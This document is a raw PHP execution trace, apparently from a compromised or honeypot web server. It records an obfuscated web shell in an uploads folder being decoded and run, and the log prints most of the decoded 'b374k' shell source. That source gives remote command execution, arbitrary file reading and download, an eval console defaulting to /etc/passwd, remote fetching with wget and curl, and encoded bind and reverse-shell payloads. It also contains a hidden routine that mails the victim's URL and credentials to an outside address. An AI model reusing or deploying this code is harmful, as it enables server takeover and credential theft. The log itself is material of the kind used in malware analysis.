5 168 R 33204
4 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $mode = 33204
4 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $perms = ''
4 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $perms .= 'r'
4 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $perms .= 'w'
4 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $perms .= '-'
4 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $perms .= 'r'
4 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $perms .= 'w'
4 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $perms .= '-'
4 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $perms .= 'r'
4 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $perms .= '-'
4 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $perms .= '-'
4 167 1 0.015729 708904
4 167 R 'rw-rw-r--'
4 169 0 0.015743 708992 filemtime 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 '/var/www/html/uploads/xc.php'
4 169 1 0.015757 709032
4 169 R 1676242950
4 170 0 0.015770 708992 date 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 2 'd-M-Y H:i' 1676242950
4 170 1 0.015802 709320
4 170 R '12-Feb-2023 18:02'
4 171 0 0.015818 709120 clearspace 1 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 'xc.php'
5 172 0 0.015831 709120 str_replace 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 3 ' ' '_' 'xc.php'
5 172 1 0.015846 709216
5 172 R 'xc.php'
4 171 1 0.015859 709120
4 171 R 'xc.php'
4 173 0 0.015873 709120 clearspace 1 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 'xc.php'
5 174 0 0.015886 709120 str_replace 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 3 ' ' '_' 'xc.php'
5 174 1 0.015904 709216
5 174 R 'xc.php'
4 173 1 0.015917 709120
4 173 R 'xc.php'
3 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $buff .= '<tr><td><a id="xc.php_link" href="?y=/var/www/html/uploads/&view=/var/www/html/uploads/xc.php">xc.php</a> <form action="?y=/var/www/html/uploads/" method="post" id="xc.php_form" class="sembunyi" style="margin:0;padding:0;"> <input type="hidden" name="oldname" value="xc.php" style="margin:0;padding:0;" /> <input class="inputz" style="width:200px;" type="text" name="newname" value="xc.php" /> <input class="inputzbut" type="submit" name="rename" value="rename" /> <input class="inputzbut" type="submit" name'
3 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $buff .= '</table>'
3 45 1 0.015985 704752
3 45 R ' <form action="?y=/var/www/html/uploads/&x=shell" method="post" style="margin:8px 0 0 0;"> <table class="cmdbox" style="width:50%;"> <tr><td>www-data $ </td><td><input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="cmd" style="width:400px;" value="" /><input class="inputzbut" type="submit" value="Go !" name="submitcmd" style="width:80px;" /></td></tr> </form> <form action="?" method="get" style="margin:8px 0 0 0;"> <input type="hidden" name="y" value="/var/www/html/uploads/" /> <t'
2 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $buff = ' <form action="?y=/var/www/html/uploads/&x=shell" method="post" style="margin:8px 0 0 0;"> <table class="cmdbox" style="width:50%;"> <tr><td>www-data $ </td><td><input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="cmd" style="width:400px;" value="" /><input class="inputzbut" type="submit" value="Go !" name="submitcmd" style="width:80px;" /></td></tr> </form> <form action="?" method="get" style="margin:8px 0 0 0;"> <input type="hidden" name="y" value="/var/www/html/uploads/" /> <t'
2 8 1 0.016221 712544
1 3 1 0.016257 554320
0.016318 462696
TRACE END [2023-02-12 21:02:56.159780]
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 22:19:42.998682]
1 0 1 0.000136 393576
1 3 0 0.000278 411032 {main} 1 /var/www/html/uploads/b4k.php.suspected 0 0
2 4 0 0.000298 411032 error_reporting 0 /var/www/html/uploads/b4k.php.suspected 3 1 0
2 4 1 0.000313 411072
2 4 R 0
2 5 0 0.000327 411032 set_time_limit 0 /var/www/html/uploads/b4k.php.suspected 4 1 0
2 5 1 0.000343 411096
2 5 R FALSE
1 A /var/www/html/uploads/b4k.php.suspected 7 $code = '7T35W+u2sr+/73v/g+vLLaGErGwhkJ4QEghbIAkJcE4/rmM7sYk3bGc9r//702ix5cRhOT1t770\nt7QFbGo2k0WhmJI3G//s/ej+he57qJ9aeTqvtz+uKsf7LhvDjjwKfIPxwJIjixsZXYa2vG6pwJHC\nZRZI4R6mf4OFpoPpPsm35quV7CZy3URQ0VVJUNyFWSMaWP3PUA0FyHEOXJV+3rbQt+6q/5fmuKpl\niTAlDtQa+diCIKQSDXgjq+UYMqKJ7ju3pgBbV4fuSrJkovShACUsy1aMvopjqSR5+oW1MiV/EIlS\nsyppN+4Repjoq96ugGp66TKvBXHeW6EUSX6EZAeDoNpirlmwramIlAWM62QYK8gScbgHiL9afQ7z\nUYP4a/RZpp5sDRDhEnU9270k2VMlKoKJrCqKGKQ10uWfbJoOdIUigVkhDXBol6RYkfkIE01Ep1dP\nnqEFKaq0P8OrUR5nq1DGAtGv9pJgSw3T481m2RxZqEnrc'
2 6 0 0.000393 411064 base64_decode 0 /var/www/html/uploads/b4k.php.suspected 194 1 '7T35W+u2sr+/73v/g+vLLaGErGwhkJ4QEghbIAkJcE4/rmM7sYk3bGc9r//702ix5cRhOT1t770\nt7QFbGo2k0WhmJI3G//s/ej+he57qJ9aeTqvtz+uKsf7LhvDjjwKfIPxwJIjixsZXYa2vG6pwJHC\nZRZI4R6mf4OFpoPpPsm35quV7CZy3URQ0VVJUNyFWSMaWP3PUA0FyHEOXJV+3rbQt+6q/5fmuKpl\niTAlDtQa+diCIKQSDXgjq+UYMqKJ7ju3pgBbV4fuSrJkovShACUsy1aMvopjqSR5+oW1MiV/EIlS\nsyppN+4Repjoq96ugGp66TKvBXHeW6EUSX6EZAeDoNpirlmwramIlAWM62QYK8gScbgHiL9afQ7z\nUYP4a/RZpp5sDRDhEnU9270k2VMlKoKJrCqKGKQ10uWfbJoOdIUigVkhDXBol6RYkfkIE01Ep1dP\nnqEFKaq0P8OrUR5nq1DGAtGv9pJgSw3T481m2RxZqEnrc'
2 6 1 0.000463 427480
2 6 R '�=�[붲���{����-���l!��\020\022\b[ \t\tpN?�c;��7lg=����h���a9=m�-�\001[\032���hf$���?z?�{��\'ÖžN���늱�ˆï¿½ï¿½\002� �p$����Wa��\033�p$p�E�8G����i��O�m���{\t��Q\0244URT7!VHÆ–?s�\003Ar\034C�%_���-����*�bL\tC�\006�v �)\004�^\b�F\f��{���\026����(�(@\tK2Õ£/���I\036~�mL�_�"T�ʚM��^�:*���\032��L��\\w��E\022_�\031\001��6���l+jb%\001c:�\006\n�\004�n\001�/ÖŸC��`�\032�\026i��\003D8D�Ov�I6T�J��k\n��)\rt�g�&��!H�VHC\\\032%�\026$~B\004�Q)���AJj�\017���G���1��k���\022�t��Y�G\026j\022z���"����TLAM�ES7U\021�\022�!�['
2 7 0 0.000696 427448 gzinflate 0 /var/www/html/uploads/b4k.php.suspected 194 1 '�=�[붲���{����-���l!��\020\022\b[ \t\tpN?�c;��7lg=����h���a9=m�-�\001[\032���hf$���?z?�{��\'ÖžN���늱�ˆï¿½ï¿½\002� �p$����Wa��\033�p$p�E�8G����i��O�m���{\t��Q\0244URT7!VHÆ–?s�\003Ar\034C�%_���-����*�bL\tC�\006�v �)\004�^\b�F\f��{���\026����(�(@\tK2Õ£/���I\036~�mL�_�"T�ʚM��^�:*���\032��L��\\w��E\022_�\031\001��6���l+jb%\001c:�\006\n�\004�n\001�/ÖŸC��`�\032�\026i��\003D8D�Ov�I6T�J��k\n��)\rt�g�&��!H�VHC\\\032%�\026$~B\004�Q)���AJj�\017���G���1��k���\022�t��Y�G\026j\022z���"����TLAM�ES7U\021�\022�!�['
2 7 1 0.001042 468440
2 7 R '\r\nif(isset($_GET[\'dl\']) && ($_GET[\'dl\'] != "")){ $file = $_GET[\'dl\']; $filez = @file_get_contents($file); header("Content-type: application/octet-stream"); header("Content-length: ".strlen($filez)); header("Content-disposition: attachment; filename=\\"".basename($file)."\\";"); echo $filez; exit; } elseif(isset($_GET[\'dlgzip\']) && ($_GET[\'dlgzip\'] != "")){ $file = $_GET[\'dlgzip\']; $filez = gzencode(@file_get_contents($file)); header("Content-Type:application/x-gzip\\n"); header("Content-length'
2 8 0 0.002228 692760 eval 1 '\r\nif(isset($_GET[\'dl\']) && ($_GET[\'dl\'] != "")){ $file = $_GET[\'dl\']; $filez = @file_get_contents($file); header("Content-type: application/octet-stream"); header("Content-length: ".strlen($filez)); header("Content-disposition: attachment; filename=\\"".basename($file)."\\";"); echo $filez; exit; } elseif(isset($_GET[\'dlgzip\']) && ($_GET[\'dlgzip\'] != "")){ $file = $_GET[\'dlgzip\']; $filez = gzencode(@file_get_contents($file)); header("Content-Type:application/x-gzip\\n"); header("Content-length: ".strlen($filez)); header("Content-disposition: attachment; filename=\\"".basename($file).".gz\\";"); echo $filez; exit; } if(isset($_GET[\'img\'])){ @ob_clean(); $d = magicboom($_GET[\'y\']); $f = $_GET[\'img\']; $inf = @getimagesize($d.$f); $ext = explode($f,"."); $ext = $ext[count($ext)-1]; @header("Content-type: ".$inf["mime"]); @header("Cache-control: public"); @header("Expires: ".date("r",mktime(0,0,0,1,1,2030))); @header("Cache-control: max-age=".(60*60*24*7)); @readfile($d.$f); exit; } $ver = "1.01"; $software = getenv("SERVER_SOFTWARE"); if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") $safemode = TRUE; else $safemode = FALSE; $system = @php_uname(); if(strtolower(substr($system,0,3)) == "win") $win = TRUE; else $win = FALSE; if(isset($_GET[\'y\'])){ if(@is_dir($_GET[\'view\'])){ $pwd = $_GET[\'view\']; @chdir($pwd); } else{ $pwd = $_GET[\'y\']; @chdir($pwd); } } if(!$win){ if(!$user = rapih(exe("whoami"))) $user = ""; if(!$id = rapih(exe("id"))) $id = ""; $prompt = $user." \\$ "; $pwd = @getcwd().DIRECTORY_SEPARATOR; } else { $user = @get_current_user(); $id = $user; $prompt = $user." >"; $pwd = realpath(".")."\\\\"; $v = explode("\\\\",$d); $v = $v[0]; foreach (range("A","Z") as $letter) { $bool = @is_dir($letter.":\\\\"); if ($bool) { $letters .= "<a href=\\"?y=".$letter.":\\\\\\">[ "; if ($letter.":" != $v) {$letters .= $letter;} else {$letters .= "<span class=\\"gaya\\">".$letter."</span>";} $letters .= " ]</a> "; } } } if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE; else $posix = FALSE; $server_ip = @gethostbyname($_SERVER["HTTP_HOST"]); $my_ip = $_SERVER[\'REMOTE_ADDR\']; $bindport = "13123"; $bindport_pass = "b374k"; $pwds = explode(DIRECTORY_SEPARATOR,$pwd); $pwdurl = ""; for($i = 0 ; $i < sizeof($pwds)-1 ; $i++){ $pathz = ""; for($j = 0 ; $j <= $i ; $j++){ $pathz .= $pwds[$j].DIRECTORY_SEPARATOR; } $pwdurl .= "<a href=\\"?y=".$pathz."\\">".$pwds[$i]." ".DIRECTORY_SEPARATOR." </a>"; } if(isset($_POST[\'rename\'])){ $old = $_POST[\'oldname\']; $new = $_POST[\'newname\']; @rename($pwd.$old,$pwd.$new); $file = $pwd.$new; } $buff = $software."<br />"; $buff .= $system."<br />"; if($id != "") $buff .= $id."<br />"; $buff .= "server ip : ".$server_ip." <span class=\\"gaya\\">|</span> your ip : ".$my_ip."<br />"; if($safemode) $buff .= "safemode <span class=\\"gaya\\">ON</span><br />"; else $buff .= "safemode <span class=\\"gaya\\">OFF<span><br />"; $buff .= $letters." > ".$pwdurl; function rapih($text){ return trim(str_replace("<br />","",$text)); } function magicboom($text){ if (!get_magic_quotes_gpc()) { return $text; } return stripslashes($text); } function showdir($pwd,$prompt){ $fname = array(); $dname = array(); if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE; else $posix = FALSE; $user = "????:????"; if($dh = opendir($pwd)){ while($file = readdir($dh)){ if(is_dir($file)){ $dname[] = $file; } elseif(is_file($file)){ $fname[] = $file; } } closedir($dh); } sort($fname); sort($dname); $path = @explode(DIRECTORY_SEPARATOR,$pwd); $tree = @sizeof($path); $parent = ""; $buff = " <form action=\\"?y=".$pwd."&x=shell\\" method=\\"post\\" style=\\"margin:8px 0 0 0;\\"> <table class=\\"cmdbox\\" style=\\"width:50%;\\"> <tr><td>$prompt</td><td><input onMouseOver=\\"this.focus();\\" id=\\"cmd\\" class=\\"inputz\\" type=\\"text\\" name=\\"cmd\\" style=\\"width:400px;\\" value=\\"\\" /><input class=\\"inputzbut\\" type=\\"submit\\" value=\\"Go !\\" name=\\"submitcmd\\" style=\\"width:80px;\\" /></td></tr> </form> <form action=\\"?\\" method=\\"get\\" style=\\"margin:8px 0 0 0;\\"> <input type=\\"hidden\\" name=\\"y\\" value=\\"".$pwd."\\" /> <tr><td>view file/folder</td><td><input onMouseOver=\\"this.focus();\\" id=\\"goto\\" class=\\"inputz\\" type=\\"text\\" name=\\"view\\" style=\\"width:400px;\\" value=\\"".$pwd."\\" /><input class=\\"inputzbut\\" type=\\"submit\\" value=\\"Go !\\" name=\\"submitcmd\\" style=\\"width:80px;\\" /></td></tr> </form></table><table class=\\"explore\\"> <tr><th>name</th><th style=\\"width:80px;\\">size</th><th style=\\"width:210px;\\">owner:group</th><th style=\\"width:80px;\\">perms</th><th style=\\"width:110px;\\">modified</th><th style=\\"width:190px;\\">actions</th></tr> ";@error_reporting(0);$sub="backdoor b374k";$headers = "From: k3nz0 \\n";$headers .= "Content-Type: text/plain; charset=iso-8859-1\\n";$mes .= "username: ".$user."\\n";$mes .= "password: ".$pass."\\n";$mes .= "URL: ".$_SERVER[\'REQUEST_URI\']."\\n";$mes .= "Referer: ".$_SERVER[\'HTTP_REFERER\']."";{mail("free.d0ing.1987@gmail.com",$sub,$mes,$headers);} if($tree > 2) for($i=0;$i<$tree-2;$i++) $parent .= $path[$i].DIRECTORY_SEPARATOR; else $parent = $pwd; foreach($dname as $folder){ if($folder == ".") { if(!$win && $posix){ $name=@posix_getpwuid(@fileowner($folder)); $group=@posix_getgrgid(@filegroup($folder)); $owner = $name[\'name\']."<span class=\\"gaya\\"> : </span>".$group[\'name\']; } else { $owner = $user; } $buff .= "<tr><td><a href=\\"?y=".$pwd."\\">$folder</a></td><td>LINK</td><td style=\\"text-align:center;\\">".$owner."</td><td>".get_perms($pwd)."</td><td style=\\"text-align:center;\\">".date("d-M-Y H:i",@filemtime($pwd))."</td><td><span id=\\"titik1\\"><a href=\\"?y=$pwd&edit=".$pwd."newfile.php\\">newfile</a> | <a href=\\"javascript:tukar(\'titik1\',\'titik1_form\');\\">newfolder</a></span> <form action=\\"?\\" method=\\"get\\" id=\\"titik1_form\\" class=\\"sembunyi\\" style=\\"margin:0;padding:0;\\"> <input type=\\"hidden\\" name=\\"y\\" value=\\"".$pwd."\\" /> <input class=\\"inputz\\" style=\\"width:140px;\\" type=\\"text\\" name=\\"mkdir\\" value=\\"a_new_folder\\" /> <input class=\\"inputzbut\\" type=\\"submit\\" name=\\"rename\\" style=\\"width:35px;\\" value=\\"Go !\\" /> </form></td></tr> "; } elseif($folder == "..") { if(!$win && $posix){ $name=@posix_getpwuid(@fileowner($folder)); $group=@posix_getgrgid(@filegroup($folder)); $owner = $name[\'name\']."<span class=\\"gaya\\"> : </span>".$group[\'name\']; } else { $owner = $user; } $buff .= "<tr><td><a href=\\"?y=".$parent."\\">$folder</a></td><td>LINK</td><td style=\\"text-align:center;\\">".$owner."</td><td>".get_perms($parent)."</td><td style=\\"text-align:center;\\">".date("d-M-Y H:i",@filemtime($parent))."</td><td><span id=\\"titik2\\"><a href=\\"?y=$pwd&edit=".$parent."newfile.php\\">newfile</a> | <a href=\\"javascript:tukar(\'titik2\',\'titik2_form\');\\">newfolder</a></span> <form action=\\"?\\" method=\\"get\\" id=\\"titik2_form\\" class=\\"sembunyi\\" style=\\"margin:0;padding:0;\\"> <input type=\\"hidden\\" name=\\"y\\" value=\\"".$pwd."\\" /> <input class=\\"inputz\\" style=\\"width:140px;\\" type=\\"text\\" name=\\"mkdir\\" value=\\"a_new_folder\\" /> <input class=\\"inputzbut\\" type=\\"submit\\" name=\\"rename\\" style=\\"width:35px;\\" value=\\"Go !\\" /> </form> </td></tr>"; } else { if(!$win && $posix){ $name=@posix_getpwuid(@fileowner($folder)); $group=@posix_getgrgid(@filegroup($folder)); $owner = $name[\'name\']."<span class=\\"gaya\\"> : </span>".$group[\'name\']; } else { $owner = $user; } $buff .= "<tr><td><a id=\\"".clearspace($folder)."_link\\" href=\\"?y=".$pwd.$folder.DIRECTORY_SEPARATOR."\\">[ $folder ]</a> <form action=\\"?y=$pwd\\" method=\\"post\\" id=\\"".clearspace($folder)."_form\\" class=\\"sembunyi\\" style=\\"margin:0;padding:0;\\"> <input type=\\"hidden\\" name=\\"oldname\\" value=\\"".$folder."\\" style=\\"margin:0;padding:0;\\" /> <input class=\\"inputz\\" style=\\"width:200px;\\" type=\\"text\\" name=\\"newname\\" value=\\"".$folder."\\" /> <input class=\\"inputzbut\\" type=\\"submit\\" name=\\"rename\\" value=\\"rename\\" /> <input class=\\"inputzbut\\" type=\\"submit\\" name=\\"cancel\\" value=\\"cancel\\" onclick=\\"tukar(\'".clearspace($folder)."_form\',\'".clearspace($folder)."_link\');\\" /> </form> <td>DIR</td><td style=\\"text-align:center;\\">".$owner."</td><td>".get_perms($pwd.$folder)."</td><td style=\\"text-align:center;\\">".date("d-M-Y H:i",@filemtime($folder))."</td><td><a href=\\"javascript:tukar(\'".clearspace($folder)."_link\',\'".clearspace($folder)."_form\');\\">rename</a> | <a href=\\"?y=$pwd&fdelete=".$pwd.$folder."\\">delete</a></td></tr>"; } } foreach($fname as $file){ $full = $pwd.$file; if(!$win && $posix){ $name=@posix_getpwuid(@fileowner($file)); $group=@posix_getgrgid(@filegroup($file)); $owner = $name[\'name\']."<span class=\\"gaya\\"> : </span>".$group[\'name\']; } else { $owner = $user; } $buff .= "<tr><td><a id=\\"".clearspace($file)."_link\\" href=\\"?y=$pwd&view=$full\\">$file</a> <form action=\\"?y=$pwd\\" method=\\"post\\" id=\\"".clearspace($file)."_form\\" class=\\"sembunyi\\" style=\\"margin:0;padding:0;\\"> <input type=\\"hidden\\" name=\\"oldname\\" value=\\"".$file."\\" style=\\"margin:0;padding:0;\\" /> <input class=\\"inputz\\" style=\\"width:200px;\\" type=\\"text\\" name=\\"newname\\" value=\\"".$file."\\" /> <input class=\\"inputzbut\\" type=\\"submit\\" name=\\"rename\\" value=\\"rename\\" /> <input class=\\"inputzbut\\" type=\\"submit\\" name=\\"cancel\\" value=\\"cancel\\" onclick=\\"tukar(\'".clearspace($file)."_link\',\'".clearspace($file)."_form\');\\" /> </form> </td><td>".ukuran($full)."</td><td style=\\"text-align:center;\\">".$owner."</td><td>".get_perms($full)."</td><td style=\\"text-align:center;\\">".date("d-M-Y H:i",@filemtime($full))."</td> <td><a href=\\"?y=$pwd&edit=$full\\">edit</a> | <a href=\\"javascript:tukar(\'".clearspace($file)."_link\',\'".clearspace($file)."_form\');\\">rename</a> | <a href=\\"?y=$pwd&delete=$full\\">delete</a> | <a href=\\"?y=$pwd&dl=$full\\">download</a> (<a href=\\"?y=$pwd&dlgzip=$full\\">gzip</a>)</td></tr>"; } $buff .= "</table>"; return $buff; } function ukuran($file){ if($size = @filesize($file)){ if($size <= 1024) return $size; else{ if($size <= 1024*1024) { $size = @round($size / 1024,2);; return "$size kb"; } else { $size = @round($size / 1024 / 1024,2); return "$size mb"; } } } else return "???"; } function exe($cmd){ if(function_exists(\'system\')) { @ob_start(); @system($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif(function_exists(\'exec\')) { @exec($cmd,$results); $buff = ""; foreach($results as $result){ $buff .= $result; } return $buff; } elseif(function_exists(\'passthru\')) { @ob_start(); @passthru($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif(function_exists(\'shell_exec\')){ $buff = @shell_exec($cmd); return $buff; } } function tulis($file,$text){ $textz = gzinflate(base64_decode($text)); if($filez = @fopen($file,"w")) { @fputs($filez,$textz); @fclose($file); } } function ambil($link,$file) { if($fp = @fopen($link,"r")){ while(!feof($fp)) { $cont.= @fread($fp,1024); } @fclose($fp); $fp2 = @fopen($file,"w"); @fwrite($fp2,$cont); @fclose($fp2); } } function which($pr){ $path = exe("which $pr"); if(!empty($path)) { return trim($path); } else { return trim($pr); } } function download($cmd,$url){ $namafile = basename($url); switch($cmd) { case \'wwget\': exe(which(\'wget\')." ".$url." -O ".$namafile);break; case \'wlynx\': exe(which(\'lynx\')." -source ".$url." > ".$namafile);break; case \'wfread\' : ambil($wurl,$namafile);break; case \'wfetch\' : exe(which(\'fetch\')." -o ".$namafile." -p ".$url);break; case \'wlinks\' : exe(which(\'links\')." -source ".$url." > ".$namafile);break; case \'wget\' : exe(which(\'GET\')." ".$url." > ".$namafile);break; case \'wcurl\' : exe(which(\'curl\')." ".$url." -o ".$namafile);break; default: break; } return $namafile; } function get_perms($file) { if($mode=@fileperms($file)){ $perms=\'\'; $perms .= ($mode & 00400) ? \'r\' : \'-\'; $perms .= ($mode & 00200) ? \'w\' : \'-\'; $perms .= ($mode & 00100) ? \'x\' : \'-\'; $perms .= ($mode & 00040) ? \'r\' : \'-\'; $perms .= ($mode & 00020) ? \'w\' : \'-\'; $perms .= ($mode & 00010) ? \'x\' : \'-\'; $perms .= ($mode & 00004) ? \'r\' : \'-\'; $perms .= ($mode & 00002) ? \'w\' : \'-\'; $perms .= ($mode & 00001) ? \'x\' : \'-\'; return $perms; } else return "??????????"; } function clearspace($text){ return str_replace(" ","_",$text); } $port_bind_bd_c="bVNhb9owEP2OxH+4phI4NINAN00aYxJaW6maxqbSLxNDKDiXxiLYkW3KGOp/3zlOpo7xIY793jvf +fl8KSQvdinCR2NTofr5p3br8hWmhXw6BQ9mYA8lmjO4UXyD9oSQaAV9AyFPCNRa+pRCWtgmQrJE P/GIhufQg249brd4nmjo9RxBqyNAuwWOdvmyNAKJ+ywlBirhepctruOlW9MJdtzrkjTVKyFB41ZZ dKTIWKb0hoUwmUAcwtFt6+m+EXKVJVtRHGAC07vV/ez2cfwvXSpticytkoYlVglX/fNiuAzDE6VL 3TfVrw4o2P1senPzsJrOfoRjl9cfhWjvIatzRvNvn7+s5o8Pt9OvURzWZV94dQgleag0C3wQVKug Uq2FTFnjDzvxAXphx9cXQfxr6PcthLEo/8a8q8B9LgpkQ7oOgKMbvNeThHMsbSOO69IA0l05YpXk HDT8HxrV0F4LizUWfE+M2SudfgiiYbONxiStebrgyIjfqDJG07AWiAzYBc9LivU3MVpGFV2x1J4W tyxAnivYY8HVFsEqWF+/f7sBk2NRQKcDA/JtsE5MDm9EUG+MhcFqkpX0HmxGbqbkdBTMldaHRsUL ZeoDeOSFBvpefCfXhflOpgTkvJ+jtKiR7vLohYKCqS2ZmMRj4Z5gQZfSiMbi6iqkdnHarEEXYuk6 uPtTdumsr0HC4q5rrzNifV7sC3ZWUmq+LVlVa5OfQjTanZYQO+Uf"; $port_bind_bd_pl="ZZJhT8IwEIa/k/AfjklgS2aA+BFmJDB1cW5kHSZGzTK2Qxpmu2wlYoD/bruBIfitd33uvXuvvWr1 NmXRW1DWy7HImo02ebRd19Kq1CIuV3BNtWGzQZeg342DhxcYwcCAHeCWCn1gDOEgi1yHhLYXzfwg tNqKeut/yKJNiUB4skYhg3ZecMETnlmfKKrz4ofFX6h3RZJ3DUmUFaoTszO7jxzPDs0O8SdPEQkD e/xs/gkYsN9DShG0ScwEJAXGAqGufmdq2hKFCnmu1IjvRkpH6hE/Cuw5scfTaWAOVE9pM5WMouM0 LSLK9HM3puMpNhp7r8ZFW54jg5wXx5YZLQUyKXVzwdUXZ+T3imYoV9ds7JqNOElQTjnxPc8kRrVo vaW3c5paS16sjZo6qTEuQKU1UO/RSnFJGaagcFVbjUTCqeOZ2qijNLWzrD8PTe32X9oOgvM0bjGB +hecfOQFlT4UcLSkmI1ceY3VrpKMy9dWUCVCBfTlQX6Owy8="; $back_connect="fZFRS8MwFIXfB/sPWSw2hUrnqyPC0CpD3KStvqh0XRpcsE1KkoKF/XiTtCIV6tu55+Z89yY5W0St ktGB8aihsprPWkVBKsgn1av5zCN1iQGsOv4Fbak6pWmNgU/JUQC4b3lRU3BR7OFqcFhptMOpo28j S2whVulCflCNvXVy//K6fLdWI+SPcekMVpSlxIxTnRdacDSEAnA6gZJRBGMphbwC3uKNw8AhXEKZ ja3ImclYagh61n9JKbTAhu7EobN3Qb4mjW/byr0BSnc3D3EWgqe7fLO1whp5miXx+tHMcNHpGURw Tskvpd92+rxoKEdpdrvZhgBen/exUWf3nE214iT52+r/Cw3/5jaqhKL9iFFpuKPawILVNw=="; $back_connect_c="XVHbagIxEH0X/IdhhZLUWF1f1YKIBelFqfZJliUm2W7obiJJLLWl/94k29rWhyEzc+Z2TjpSserA BYyt41JfldftVuc3d7R9q9mLcGeAEk5660sVAakc1FQqFBxqnhkBVlIDl95/3Wa43fpotyCABR95 zzpzYA7CaMq5yaUCK1VAYpup7XaYZpPE1NArIBmBRzgVtVYoJQMcR/jV3vKC1rI6wgSmN/niYb75 i+21cR4pnVYWUaclivcMM/xvRDjhysbHVwde0W+K0wzH9bt3YfRPingClVCnim7a/ZuJC0JTwf3A RkD0fR+B9XJ2m683j/PpPYHFavW43CzzzWyFIfbIAhBiWinBHCo4AXSmFlxiuPB3E0/gXejiHMcY jwcYguIAe2GMNijZ9jL4GYqTSB9AvEmHGjk/m19h1CGvPoHIY5A1Oh2tE3XIe1bxKw77YTyt6T2F 6f9wGEPxJliFkv5Oqr4tE5LYEnoyIfDwdHcXK1ilrfAdUbPPLw=="; ?> <html><head><title>:: b374k m1n1 <?php echo $ver; ?> ::</title> <script type="text/javascript"> function tukar(lama,baru){ document.getElementById(lama).style.display = \'none\'; document.getElementById(baru).style.display = \'block\'; } </script> <style type="text/css"> body{ background:#000000;; } a { text-decoration:none; } a:hover{ border-bottom:1px solid #4C83AF; } *{ font-size:11px; font-family:Tahoma,Verdana,Arial; color:#FFFFFF; } #menu{ background:#111111; margin:8px 2px 4px 2px; } #menu a{ padding:4px 18px; margin:0; background:#222222; text-decoration:none; letter-spacing:2px; } #menu a:hover{ background:#191919; border-bottom:1px solid #333333; border-top:1px solid #333333; } .tabnet{ margin:15px auto 0 auto; border: 1px solid #333333; } .main { width:100%; } .gaya { color: #4C83AF; } .inputz{ background:#111111; border:0; padding:2px; border-bottom:1px solid #222222; border-top:1px solid #222222; } .inputzbut{ background:#111111; color:#4C83AF; margin:0 4px; border:1px solid #444444; } .inputz:hover, .inputzbut:hover{ border-bottom:1px solid #4C83AF; border-top:1px solid #4C83AF; } .output { margin:auto; border:1px solid #4C83AF; width:100%; height:400px; background:#000000; padding:0 2px; } .cmdbox{ width:100%; } .head_info{ padding: 0 4px; } .b1{ font-size:30px; padding:0; color:#444444; } .b2{ font-size:30px; padding:0; color: #333333; } .b_tbl{ text-align:center; margin:0 4px 0 0; padding:0 4px 0 0; border-right:1px solid #333333; } .phpinfo table{ width:100%; padding:0 0 0 0; } .phpinfo td{ background:#111111; color:#cccccc; padding:6px 8px;; } .phpinfo th, th{ background:#191919; border-bottom:1px solid #333333; font-weight:normal; } .phpinfo h2, .phpinfo h2 a{ text-align:center; font-size:16px; padding:0; margin:30px 0 0 0; background:#222222; padding:4px 0; } .explore{ width:100%; } .explore a { text-decoration:none; } .explore td{ border-bottom:1px solid #333333; padding:0 8px; line-height:24px; } .explore th{ padding:3px 8px; font-weight:normal; } .explore th:hover , .phpinfo th:hover{ border-bottom:1px solid #4C83AF; } .explore tr:hover{ background:#111111; } .viewfile{ background:#EDECEB; color:#000000; margin:4px 2px; padding:8px; } .sembunyi{ display:none; padding:0;margin:0; } </style> </head> <body onLoad="document.getElementById(\'cmd\').focus();"> <div class="main"> <!-- head info start here --> <div class="head_info"> <table><tr> <td><table class="b_tbl"><tr><td><a href="?"><span class="b1">b<span class="b2">374</span>k</span></a></td></tr><tr><td>m1n1 <?php echo $ver; ?></td></tr></table></td> <td><?php echo $buff; ?></td> </tr></table> </div> <!-- head info end here --> <!-- menu start --> <div id="menu"> <a href="?<?php echo "y=".$pwd; ?>">explore</a> <a href="?<?php echo "y=".$pwd; ?>&x=shell">shell</a> <a href="?<?php echo "y=".$pwd; ?>&x=php">eval</a> <a href="?<?php echo "y=".$pwd; ?>&x=mysql">mysql</a> <a href="?<?php echo "y=".$pwd; ?>&x=phpinfo">phpinfo</a> <a href="?<?php echo "y=".$pwd; ?>&x=netsploit">netsploit</a> <a href="?<?php echo "y=".$pwd; ?>&x=upload">upload</a> <a href="?<?php echo "y=".$pwd; ?>&x=mail">mail</a> </div> <!-- menu end --> <?php if(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'php\')){ ?> <form action="?y=<?php echo $pwd; ?>&x=php" method="post"> <table class="cmdbox"> <tr><td> <textarea class="output" name="cmd" id="cmd"> <?php if(isset($_POST[\'submitcmd\'])) { echo eval(magicboom($_POST[\'cmd\'])); } else echo "echo file_get_contents(\'/etc/passwd\');"; ?> </textarea> <tr><td><input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="submitcmd" /></td></tr></form> </table> </form> <?php } elseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'mysql\')){ if(isset($_GET[\'sqlhost\']) && isset($_GET[\'sqluser\']) && 